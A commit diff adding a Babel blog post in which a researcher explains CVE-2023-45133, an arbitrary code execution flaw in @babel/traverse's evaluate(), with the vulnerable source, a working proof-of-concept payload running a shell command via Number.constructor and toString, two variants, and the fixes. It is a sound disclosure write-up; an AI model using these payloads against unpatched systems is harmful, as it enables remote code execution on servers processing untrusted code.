Merge branch 'main' of https://github.com/babel/website into sync-6db…

…c559d
docschina · Oct 18, 2023 · b27e736
2 parents 30547a3 + 6dbc559
commit b27e736
Showing 2 changed files with 383 additions and 0 deletions.
diff --git a/website/blog/2023-10-16-cve-2023-45133.md b/website/blog/2023-10-16-cve-2023-45133.md
@@ -0,0 +1,383 @@
+---
+layout: post
+title:  "CVE-2023-45133: Finding an Arbitrary Code Execution Vulnerability In Babel"
+author: William Khem Marquez
+authorURL: https://github.com/SteakEnthusiast/
+date:   2023-10-18 0:00:00
+share_text: "CVE-2023-45133: Finding an Arbitrary Code Execution Vulnerability In Babel"
+---
+
+<head>
+  <link rel="canonical" href="https://steakenthusiast.github.io/2023/10/11/CVE-2023-45133-Finding-an-Arbitrary-Code-Execution-Vulnerability-In-Babel/" />
+</head>
+
+On October 10th, 2023, I stumbled upon an arbitrary code execution vulnerability in [Babel](https://github.com/babel/babel/), which was subsequently assigned the identifier CVE-2023-45133. In this post, I’ll walk you through the journey of discovering and exploiting this intriguing flaw.
+
+<!-- truncate -->
+
+:::tip
+This article was originally published on [William Khem Marquez's blog](https://steakenthusiast.github.io/). He also published a series on using Babel to deobfuscate JavaScript code: check it out!
+:::
+
+Those who use Babel for reverse engineering or code deobfuscation value it for its built-in functionality. One of the most useful features is the ability to statically evaluate expressions using `path.evaluate()` and `path.evaluateTruthy()`. I have written about this in previous articles:
+
+- [Constant Folding](https://steakenthusiast.github.io/2022/05/28/Deobfuscating-Javascript-via-AST-Manipulation-Constant-Folding/)
+- [A Peculiar JSFuck-style Case](https://steakenthusiast.github.io/2022/06/14/Deobfuscating-Javascript-via-AST-Deobfuscating-a-Peculiar-JSFuck-style-Case/)
+
+Wait, did I say _statically evaluate_?
+
+## The Exploit
+
+Before delving into the details, let’s take a look at the proof of concept I came up with:
+
+### Proof of Concept
+
+```javascript
+const parser = require("@babel/parser");
+const traverse = require("@babel/traverse").default;
+
+const source = `String({  toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")});`;
+
+const ast = parser.parse(source);
+
+const evalVisitor = {
+  Expression(path) {
+    path.evaluate();
+  },
+};
+
+traverse(ast, evalVisitor);
+```
+
+This simply outputs the result of the `id` command to the terminal, as can be seen below.
+
+```
+┌──(kali㉿kali)-[~/Babel RCE]
+└─$ node exploit.js
+uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),111(bluetooth),115(scanner),138(wireshark),141(kaboxer),142(vboxsf)
+```
+
+Of course, the payload can be adapted to do anything, such as exfiltrate data or spawn a reverse shell.
+
+<img alt="😁" src="/assets/2023-10-16-cve-2023-45133/success.jpg" style={{
+  display: "block",
+  marginLeft: "auto",
+  marginRight: "auto",
+  width: "50%"
+}} />
+
+### Exploit Breakdown
+
+To understand why this vulnerability works, we need to look at the source code of the culprit function, `evaluate`. The source code of `babel-traverse/src/path/evaluation.ts` prior to the fix is archived [here](https://github.com/babel/babel/blob/7e198e5959b18373db3936fa3223c0811cebfac1/packages/babel-traverse/src/path/evaluation.ts).
+
+```typescript
+/**
+ * Walk the input `node` and statically evaluate it.
+ *
+ * Returns an object in the form `{ confident, value, deopt }`. `confident`
+ * indicates whether or not we had to drop out of evaluating the expression
+ * because of hitting an unknown node that we couldn't confidently find the
+ * value of, in which case `deopt` is the path of said node.
+ *
+ * Example:
+ *
+ *   t.evaluate(parse("5 + 5")) // { confident: true, value: 10 }
+ *   t.evaluate(parse("!true")) // { confident: true, value: false }
+ *   t.evaluate(parse("foo + foo")) // { confident: false, value: undefined, deopt: NodePath }
+ *
+ */
+
+export function evaluate(this: NodePath): {
+  confident: boolean;
+  value: any;
+  deopt?: NodePath;
+} {
+  const state: State = {
+    confident: true,
+    deoptPath: null,
+    seen: new Map(),
+  };
+  let value = evaluateCached(this, state);
+  if (!state.confident) value = undefined;
+
+  return {
+    confident: state.confident,
+    deopt: state.deoptPath,
+    value: value,
+  };
+}
+```
+
+When `evaluate` is called on a NodePath, it goes through the `evaluateCached` wrapper before reaching the `_evaluate` function, which does all the heavy lifting. The `_evaluate` function is where the vulnerability lies.
+
+This function is responsible for recursively breaking down AST nodes until it reaches an atomic operation that can be evaluated confidently. The majority of the base cases are evaluated for atomic operations only (such as for binary expressions between two literals). However, there are a few exceptions to this rule.
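
The recursion described above can be illustrated with a toy evaluator. This is a minimal sketch over hand-built, ESTree-like objects, not Babel's implementation: `toyEvaluate` and the node helpers are hypothetical names, and only two operators are supported.

```javascript
// Toy model of "confident" static evaluation. NOT Babel's code:
// node shapes are simplified and all names here are hypothetical.
function toyEvaluate(node) {
  const state = { confident: true, deopt: null };

  function visit(n) {
    if (!state.confident) return undefined; // an earlier node already gave up
    switch (n.type) {
      case "NumericLiteral":
      case "StringLiteral":
        return n.value; // base case: a literal's value is always known
      case "BinaryExpression": {
        const left = visit(n.left);
        const right = visit(n.right);
        if (!state.confident) return undefined;
        if (n.operator === "+") return left + right;
        if (n.operator === "*") return left * right;
        break; // unsupported operator: give up below
      }
    }
    // Anything that cannot be resolved statically (e.g. an Identifier).
    state.confident = false;
    state.deopt = n;
    return undefined;
  }

  const value = visit(node);
  return {
    confident: state.confident,
    value: state.confident ? value : undefined,
    deopt: state.deopt,
  };
}

const num = (value) => ({ type: "NumericLiteral", value });
const fivePlusFive = {
  type: "BinaryExpression",
  operator: "+",
  left: num(5),
  right: num(5),
};
const fooPlusFive = {
  type: "BinaryExpression",
  operator: "+",
  left: { type: "Identifier", name: "foo" },
  right: num(5),
};

console.log(toyEvaluate(fivePlusFive).value); // 10
console.log(toyEvaluate(fooPlusFive).confident); // false
```

The important property is that every value returned here is produced by the evaluator's own host runtime, which is why the set of operations it is willing to perform matters so much.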
+
+The two pieces of the source code we care about are the handling of **call expressions** and **object expressions**, as shown below:
+
+#### Vulnerable Source Code
+
+<details>
+<summary>Relevant <code>_evaluate</code> source code</summary>
+
+```typescript
+const VALID_OBJECT_CALLEES = ["Number", "String", "Math"] as const;
+const VALID_IDENTIFIER_CALLEES = [
+  "isFinite",
+  "isNaN",
+  "parseFloat",
+  "parseInt",
+  "decodeURI",
+  "decodeURIComponent",
+  "encodeURI",
+  "encodeURIComponent",
+  process.env.BABEL_8_BREAKING ? "btoa" : null,
+  process.env.BABEL_8_BREAKING ? "atob" : null,
+] as const;
+
+const INVALID_METHODS = ["random"] as const;
+
+function isValidObjectCallee(
+  val: string
+): val is (typeof VALID_OBJECT_CALLEES)[number] {
+  return VALID_OBJECT_CALLEES.includes(
+    // @ts-expect-error val is a string
+    val
+  );
+}
+
+function isValidIdentifierCallee(
+  val: string
+): val is (typeof VALID_IDENTIFIER_CALLEES)[number] {
+  return VALID_IDENTIFIER_CALLEES.includes(
+    // @ts-expect-error val is a string
+    val
+  );
+}
+
+function isInvalidMethod(val: string): val is (typeof INVALID_METHODS)[number] {
+  return INVALID_METHODS.includes(
+    // @ts-expect-error val is a string
+    val
+  );
+}
+
+function _evaluate(path: NodePath, state: State): any {
+  /** snip **/
+  if (path.isObjectExpression()) {
+    const obj = {};
+    const props = path.get("properties");
+    for (const prop of props) {
+      if (prop.isObjectMethod() || prop.isSpreadElement()) {
+        deopt(prop, state);
+        return;
+      }
+      const keyPath = (prop as NodePath<t.ObjectProperty>).get("key");
+      let key;
+      // @ts-expect-error todo(flow->ts): type refinement issues ObjectMethod and SpreadElement somehow not excluded
+      if (prop.node.computed) {
+        key = keyPath.evaluate();
+        if (!key.confident) {
+          deopt(key.deopt, state);
+          return;
+        }
+        key = key.value;
+      } else if (keyPath.isIdentifier()) {
+        key = keyPath.node.name;
+      } else {
+        key = (
+          keyPath.node as t.StringLiteral | t.NumericLiteral | t.BigIntLiteral
+        ).value;
+      }
+      const valuePath = (prop as NodePath<t.ObjectProperty>).get("value");
+      let value = valuePath.evaluate();
+      if (!value.confident) {
+        deopt(value.deopt, state);
+        return;
+      }
+      value = value.value;
+      // @ts-expect-error key is any type
+      obj[key] = value;
+    }
+    return obj;
+  }
+
+  /** snip **/
+  if (path.isCallExpression()) {
+    const callee = path.get("callee");
+    let context;
+    let func;
+
+    // Number(1);
+    if (
+      callee.isIdentifier() &&
+      !path.scope.getBinding(callee.node.name) &&
+      (isValidObjectCallee(callee.node.name) ||
+        isValidIdentifierCallee(callee.node.name))
+    ) {
+      func = global[callee.node.name];
+    }
+
+    if (callee.isMemberExpression()) {
+      const object = callee.get("object");
+      const property = callee.get("property");
+
+      // Math.min(1, 2)
+      if (
+        object.isIdentifier() &&
+        property.isIdentifier() &&
+        isValidObjectCallee(object.node.name) &&
+        !isInvalidMethod(property.node.name)
+      ) {
+        context = global[object.node.name];
+        // @ts-expect-error property may not exist in context object
+        func = context[property.node.name];
+      }
+
+      // "abc".charCodeAt(4)
+      if (object.isLiteral() && property.isIdentifier()) {
+        // @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type (StringLiteral and NumberLiteral)
+        const type = typeof object.node.value;
+        if (type === "string" || type === "number") {
+          // @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type
+          context = object.node.value;
+          func = context[property.node.name];
+        }
+      }
+    }
+
+    if (func) {
+      const args = path
+        .get("arguments")
+        .map((arg) => evaluateCached(arg, state));
+      if (!state.confident) return;
+
+      return func.apply(context, args);
+    }
+  }
+  /** snip **/
+}
+```
+
+</details>
+
+#### Handling of Call Expressions
+
+The first thing to understand is that while call expressions can indeed be evaluated, they are subject to a whitelist check, relying on the `VALID_OBJECT_CALLEES` or `VALID_IDENTIFIER_CALLEES` arrays.
+
+Additionally, there are three cases for handling call expressions:
+
+1. When the callee is an identifier, and the identifier is whitelisted in `VALID_OBJECT_CALLEES` or `VALID_IDENTIFIER_CALLEES`.
+2. When the callee is a member expression, the object is an identifier, the identifier is whitelisted in `VALID_OBJECT_CALLEES`, and the property is not blacklisted in `INVALID_METHODS`.
+3. When the callee is a member expression, the object is a string or numeric literal, and the property is an identifier.
+
+The most interesting one is the second case:
+
+```typescript
+if (
+  object.isIdentifier() &&
+  property.isIdentifier() &&
+  isValidObjectCallee(object.node.name) &&
+  !isInvalidMethod(property.node.name)
+) {
+  context = global[object.node.name];
+  // @ts-expect-error property may not exist in context object
+  func = context[property.node.name];
+}
+
+/** snip **/
+if (func) {
+  const args = path.get("arguments").map((arg) => evaluateCached(arg, state));
+  if (!state.confident) return;
+
+  return func.apply(context, args);
+}
+```
+
+The only blacklisted method is `random`, which is a method of the `Math` object. This means that any other method of either the whitelisted `Number`, `String`, or `Math` objects can be directly referenced.
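
To make the check concrete, here is a minimal sketch of the case-2 lookup that works on plain names instead of AST nodes. `resolveMemberCallee` is a hypothetical helper written for this illustration, not a Babel function; only the two array names are taken from the excerpt above.

```javascript
// Simplified model of the pre-patch member-expression lookup (case 2).
// It takes plain strings rather than AST nodes; the helper is hypothetical.
const VALID_OBJECT_CALLEES = ["Number", "String", "Math"];
const INVALID_METHODS = ["random"];

function resolveMemberCallee(objectName, propertyName) {
  if (
    VALID_OBJECT_CALLEES.includes(objectName) &&
    !INVALID_METHODS.includes(propertyName)
  ) {
    const context = globalThis[objectName];
    // A plain property read also follows the prototype chain,
    // so inherited properties are reachable here.
    return { context, func: context[propertyName] };
  }
  return { context: undefined, func: undefined };
}

console.log(resolveMemberCallee("Math", "max").func === Math.max); // true
console.log(resolveMemberCallee("Math", "random").func); // undefined
console.log(resolveMemberCallee("Number", "constructor").func === Function); // true
```

In this model, the property name is only compared against a one-entry denylist, so `constructor` is accepted like any other name.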
+
+In JavaScript, all classes are functions. Since `Number` and `String` are global JavaScript classes, they inherit a `constructor` property from `Function.prototype`, and that property points to the `Function` constructor.
+
+Therefore, the two expressions below are equivalent:
+
+```javascript
+Number.constructor('javascript_code_here;');
+Function('javascript_code_here;');
+```
+
+Passing in an arbitrary string to the `Function` constructor returns a function that will evaluate the provided string as JavaScript code when called.
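
The following snippet is a small, harmless check of that behaviour in plain JavaScript. `demoFlag` is a hypothetical global used only to observe when the generated body runs.

```javascript
// Number and String are functions, so `constructor` resolves to Function.
console.log(Number.constructor === Function); // true
console.log(String.constructor === Function); // true

// Building a function from a string does not run its body.
globalThis.demoFlag = false; // hypothetical global, used only for this demo
const made = Number.constructor("globalThis.demoFlag = true; return 6 * 7;");
console.log(typeof made); // "function"
console.log(globalThis.demoFlag); // false

// The body runs only once something calls the function.
const result = made();
console.log(result); // 42
console.log(globalThis.demoFlag); // true
```

Note that creating the function and calling it are two separate steps.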
+
+The AST node generated by `Number.constructor('javascript_code_here;')` contains:
+
+- A call expression, where
+  - The callee is a member expression, where
+    - The object is an identifier, with name whitelisted by `VALID_OBJECT_CALLEES`
+    - The property is an identifier, not blacklisted by `INVALID_METHODS`
+  - The arguments are a single string literal, containing the code to be executed.
+
+Therefore, the code is considered safe to evaluate, and we have successfully crafted a malicious function.
+
+However, it is crucial to note that this _cannot call the function on its own_. It only **creates an anonymous function**.
+
+So, how exactly _can_ we call the function? This is where the second piece of the puzzle comes in: **object expressions**.
+
+#### Handling of Object Expressions
+
+Within Babel’s `_evaluate` method, an `ObjectExpression` node undergoes recursive evaluation, producing a true JavaScript object. There’s no limitation on key names for `ObjectProperty`. As long as every `ObjectProperty` child in the `ObjectExpression` yields `confident: true` from `_evaluate()`, we can obtain a JavaScript object with custom keys/values.
+
+A key property to leverage is `toString` ([MDN Reference](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/toString)). Setting this property to a function we control lets us execute arbitrary code when the object is converted to a string.
+
+This is exactly what we do in the payload:
+
+```javascript
+String(({  toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
+```
+
+We’ve assigned our malicious function, crafted via the `Function` constructor, to the `toString` property of the object. Thus, when this object undergoes a string conversion, it gets triggered and executed.
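
The trigger can be reproduced without Babel or any dangerous payload. In this sketch the "malicious" function is a benign stand-in that only records that it ran; `events` and `trapped` are names chosen for the illustration.

```javascript
// Benign stand-in for the payload: the function only records that it ran.
const events = [];

const trapped = {
  toString: function () {
    events.push("toString ran");
    return "converted";
  },
};

console.log(events.length); // 0, building the object runs nothing

const text = String(trapped); // string conversion invokes our toString
console.log(text); // "converted"
console.log(events.length); // 1
```

The object itself is inert; the code runs at the moment something asks for its string form.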
+
+In the provided example, we pass the object to the `String` function, given its status as a whitelisted function (referenced in case 1). Still, the `String` constructor isn’t mandatory. Implicit type coercion in JavaScript can also trigger our malicious function, as demonstrated in these alternative payload formats:
+
+```javascript
+""+(({  toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
+```
+
+```javascript
+1+(({  valueOf: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
+```
+
+The first example employs type-coercion to transform the object into a string. In contrast, the second example utilizes type-coercion to convert it into a number, as detailed in [Object.prototype.valueOf()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/valueOf). Both examples exploit the `_evaluate()` method’s approach to handling `BinaryExpression` nodes, which directly performs the operation after recursively evaluating the left and right operands.
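
Both coercion paths can be observed in plain JavaScript with harmless functions. This is a sketch of the language behaviour only, with hypothetical variable names, and it does not involve Babel.

```javascript
// Record which conversion hook each binary expression ends up calling.
const calls = [];

const viaToString = {
  toString: () => {
    calls.push("toString");
    return "x";
  },
};

const viaValueOf = {
  valueOf: () => {
    calls.push("valueOf");
    return 41;
  },
};

// The inherited valueOf returns the object itself, so `+` falls back to toString.
const concatenated = "" + viaToString;
console.log(concatenated); // "x"

// Our own valueOf returns a number, so it is used directly.
const sum = 1 + viaValueOf;
console.log(sum); // 42

console.log(calls.join(",")); // "toString,valueOf"
```

Any evaluator that applies `+` to such objects in its own runtime will invoke these hooks as a side effect.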
+
+## The Patch
+
+Upon disclosing this vulnerability, I was impressed by the swift response from the Babel team, who promptly rolled out a patch. This patch was released in two parts:
+
+The first was a workaround for all of the affected official Babel packages, which guards the calls to `evaluate()` with an `isPure()` check. [isPure](https://github.com/babel/babel/blob/4c155667cf50291132089a4556cd3c6cc9d2e640/packages/babel-traverse/src/scope/index.ts#L871) inherently prevents this bug, as it returns false for all `MemberExpression` nodes. [PR #16032: Update babel-polyfills packages](https://github.com/babel/babel/pull/16032)
+
+The subsequent step involved refining the `evaluate()` function. This adjustment ensured that all inherited methods, not only `constructor`, were prevented from being called. [PR #16033: Only evaluate own String/Number/Math methods](https://github.com/babel/babel/pull/16033)
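
The idea behind this second fix can be sketched as an own-property check. This illustrates the principle rather than reproducing the code from PR #16033; `resolveOwnMethod` is a hypothetical helper that takes plain names instead of AST nodes.

```javascript
// Sketch of an "own methods only" lookup. Hypothetical helper, not Babel's code.
const VALID_OBJECT_CALLEES = ["Number", "String", "Math"];
const INVALID_METHODS = ["random"];

function resolveOwnMethod(objectName, propertyName) {
  if (
    !VALID_OBJECT_CALLEES.includes(objectName) ||
    INVALID_METHODS.includes(propertyName)
  ) {
    return undefined;
  }
  const context = globalThis[objectName];
  // Reject anything that is only reachable through the prototype chain.
  if (!Object.prototype.hasOwnProperty.call(context, propertyName)) {
    return undefined;
  }
  return context[propertyName];
}

console.log(resolveOwnMethod("Math", "max") === Math.max); // true
console.log(resolveOwnMethod("String", "fromCharCode") === String.fromCharCode); // true
console.log(resolveOwnMethod("Number", "constructor")); // undefined
```

Because `constructor` lives on `Function.prototype` rather than on `Number` itself, it no longer resolves, and neither does any other inherited property.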
+
+After the fixes were implemented, GitHub staff issued [**CVE-2023-45133**](https://github.com/advisories/GHSA-67hx-6x53-jw92) for the security advisory.
+
+## A side note on disclosure timing
+
+You might have noticed that this blog post was released on the same day as the security advisory. Usually for critical vulnerabilities, it’s customary to wait a while before disclosing a proof of concept. However, I believe this disclosure timing is justifiable for a few reasons:
+
+First, the vast majority of Babel users are unaffected by this vulnerability. Babel is primarily used for refactoring and transpiling **one’s own code**, so the typical use case doesn’t expose users to this risk. It’s improbable that many have server-side implementations that accept and process arbitrary code from users through the compilation plugins or the invocation of `path.evaluate`. Furthermore, there are really only a couple of real use cases for using Babel to analyze untrusted code on the server side:
+
+1.  Reverse engineering bot mitigation software, etc.
+2.  Malware analysis
+
+In the first case, I doubt any legitimate bot mitigation entity would attempt Remote Code Execution (RCE), given the legal ramifications. Meanwhile, professionals using Babel for malware reversal have the expertise to conduct their analyses within controlled, sandboxed environments. Thus, the risk to the community, in real-world scenarios, remains minimal.
+
+## Conclusion
+
+Discovering and delving into this vulnerability was a fun experience. I initially stumbled upon the vulnerability during a brainstorming session for a Babel-based challenge for UofTCTF’s upcoming capture the flag competition, where I was focusing on an entirely different, non-security-related “bug”.
+
+This vulnerability predominantly impacts those integrating untrusted code with Babel. Unfortunately, this places individuals leveraging Babel for “static deobfuscation” directly in the crosshairs of this attack vector.
+
+There’s a touch of irony in the fact that my first credited CVE emerged from reverse engineering Babel - the very tool I often employ for reverse engineering JavaScript, and the topic of all of my previous posts 🤣.
+
+This was a great learning experience, and hopefully this write-up was useful to you as well. Thanks for reading, and take care!
+
+## References
+
+- [CVE-2023-45133](https://www.cve.org/CVERecord?id=CVE-2023-45133)
+- [GitHub Advisory Database: Arbitrary code execution when compiling specifically crafted malicious code](https://github.com/advisories/GHSA-67hx-6x53-jw92)
diff --git a/website/static/assets/2023-10-16-cve-2023-45133/success.jpg b/website/static/assets/2023-10-16-cve-2023-45133/success.jpg